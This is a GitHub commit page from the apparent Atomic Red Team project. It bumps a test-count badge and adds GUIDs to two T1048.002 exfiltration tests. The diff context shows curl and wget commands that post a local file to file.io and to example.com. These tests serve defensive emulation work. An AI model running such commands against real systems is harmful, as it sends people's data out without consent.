Skip to content

Commit

Permalink
updating atomics count and guids [ci skip]
Browse files Browse the repository at this point in the history
  • Loading branch information
publish bot committed Apr 26, 2024
1 parent 6450adf commit 58496ee
Show file tree
Hide file tree
Showing 3 changed files with 5 additions and 1 deletion.
2 changes: 1 addition & 1 deletion README.md
Original file line number Diff line number Diff line change
Expand Up @@ -2,7 +2,7 @@

# Atomic Red Team

![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1549-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1551-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)

Atomic Red Team™ is a library of tests mapped to the
[MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use
Expand Down
2 changes: 2 additions & 0 deletions atomics/T1048.002/T1048.002.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -57,6 +57,7 @@ atomic_tests:
command: |
curl -F 'file=@#{input_file}' -F 'maxDownloads=1' -F 'autoDelete=true' https://file.io/
- name: Exfiltrate data in a file over HTTPS using wget
auto_generated_guid: 7ccdfcfa-6707-46bc-b812-007ab6ff951c
description: |
Exfiltrate data over HTTPS using wget --post-file method
supported_platforms:
Expand All @@ -72,6 +73,7 @@ atomic_tests:
command: |
wget --post-file="#{input_file}" --timeout=5 --no-check-certificate https://example.com/ --delete-after
- name: Exfiltrate data as text over HTTPS using wget
auto_generated_guid: 8bec51da-7a6d-4346-b941-51eca448c4b0
description: |
Exfiltrate data over HTTPS using wget --post-data method
supported_platforms:
Expand Down
2 changes: 2 additions & 0 deletions atomics/used_guids.txt
Original file line number Diff line number Diff line change
Expand Up @@ -1597,3 +1597,5 @@ d1fa2a69-b0a2-4e8a-9112-529b00c19a41
58bd8c8d-3a1a-4467-a69c-439c75469b07
33a29ab1-cabb-407f-9448-269041bf2856
7906f0a6-b527-46ee-9026-6e81a9184e08
7ccdfcfa-6707-46bc-b812-007ab6ff951c
8bec51da-7a6d-4346-b941-51eca448c4b0

0 comments on commit 58496ee

Please sign in to comment.